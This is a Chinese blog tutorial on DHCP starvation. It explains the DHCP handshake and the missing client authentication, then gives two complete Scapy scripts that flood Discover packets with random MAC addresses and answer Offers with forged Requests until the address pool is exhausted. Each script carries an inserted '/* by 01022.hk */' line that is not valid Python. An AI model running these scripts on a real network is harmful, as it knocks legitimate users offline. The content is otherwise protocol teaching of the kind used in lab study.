DHCP 泛洪攻击小实验

DHCP 泛洪攻击

攻击原理:通过虚拟随机生成的mac 地址占用DHCP 服务器中的地址池达到正常机器无法获取到IP 地址从而无法上网

DHCP 协议原理

DHCP 是为了解决静态IP 地址,每次都需要进行手动输入IP的不方便

DHCP 客户端端口68 ,DHCP 服务端端口 67

  1. 首先Client 由于仅仅存在mac 地址,所以需要获取一个未占用的IP 用于进行标识身份上网

  2. 由于Client 并不知道DHCP Server 的IP和mac,所以会发送一个广播包 Discover(包内信息带有自身mac)

  3. DHCP Server 收到请求后,检查自身地址池,若存在空闲IP,向Discover 请求包源MAC 进行Offer 回包(默认为广播包,可以指定为单播包)

  4. Client 收到Offer 包后,进行筛选,筛选完成后确认该IP 地址,向DHCP Server 发起 Request 包用于确认该IP地址Request 包为广播包

  5. DHCP Server 收到Request 包后,在地址池中标记为此IP 已被使用,且保存其绑定的MAC 地址,进行ACK 确认包告知Client 无误


dhcp


思考:

为什么需要进行四次握手的方式才能获得IP?若是仅获取IP的话,完全可以Discover 包发起请求,Offer包回IP地址完成一次IP分配。

由于在真实的网络环境中,往往不会仅仅存在一台DHCP 服务器,而是存在多台的,若是采用Discover + Offer 的方式分配地址的话,会造成大量的IP 地址浪费,而Request 包作为广播就是为了告知所有的DHCP Server 不会使用其IP。从而不会造成地址的浪费;


漏洞点

整体从DHCP 的原理看下来,不难发现,在完成一个完整的IP 分配后,完全不会校验Client 的真实性;从而导致了一台Client 就可以伪造大量MAC 地址,按照DHCP 协议的四个数据包向Server 发起请求,即可完成占用完IP 地址池


DHCP 泛洪脚本

这里没有用到多线程的方式实现泛洪,而是采用一发一监听的方式实现泛洪(因为Client 总共发两个数据包 Discover + Request)

数据包的构建,只需要提供源MAC 即可,并在DHCP 包头标明数据包类型

xid : 用于标识数据包

src : 源mac/ip

dst : 目标mac/ip

BOOTP : DHCP 的最初协议,DHCP 就是基于BOOTP 升级的协议

/* by 01022.hk - online tools website : 01022.hk/zh/textflip.html */
from scapy.all import *
# xid 为一个客户端BOOTP 数据包的一个随机数字
for i in range(300):
	xid_random = random.randint(1,1000000000)
	mac_random = str(RandMAC())
	dhcp_discover = Ether(src=mac_random,dst="ff:ff:ff:ff:ff:ff")\
					/ IP(src = "0.0.0.0",dst = "255.255.255.255")\
					/ UDP(sport=68,dport=67)\
					/ BOOTP(chaddr=mac_random,xid=xid_random,flags=32768)\
					/ DHCP(options=[("message-type","discover"),"end"])
	sendp(dhcp_discover,iface="以太网 2")
	print("\n\n\nSending DHCPDISCOVER on" + "WLAN")
	time.sleep(1)

监听对应的物理网卡,筛选规则目标端口为DHCP 客户端从而可指定为Offer 或 ACK

这里需要取出关键的IP + Server IP + xid 即可,其余按照Request 包进行构建即可


/* by 01022.hk - online tools website : 01022.hk/zh/textflip.html */
from scapy.all import *
def dhcp_request(pkt):
        if pkt[DHCP].options[0][1]==2:
                Ether_Request = Ether(src=pkt[BOOTP].chaddr,dst = pkt[Ether].src)
                IP_Request = IP(src="0.0.0.0",dst="255.255.255.255")
                UPD_Request = UDP(sport=68,dport=67)
                BOOTP_Request = BOOTP(chaddr=pkt[BOOTP].chaddr,xid=pkt[BOOTP].xid)
                DHCP_Request = DHCP(options=[("message-type","request"),("server_id",pkt[IP].src),("requested_addr",pkt[BOOTP].yiaddr),"end"])
                Request = Ether_Request/IP_Request/UPD_Request/BOOTP_Request/DHCP_Request
                sendp(Request,iface="以太网 2")
                print(pkt[BOOTP].yiaddr+"正在分配")
        elif pkt[DHCP].options[0][1]==5:
                print(pkt[BOOTP].yiaddr+"已被分配")  
        else:
                print("所有的IP已被泛洪分配完毕")
sniff(iface="以太网 2",filter="port 67",prn=dhcp_request,count=500)

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值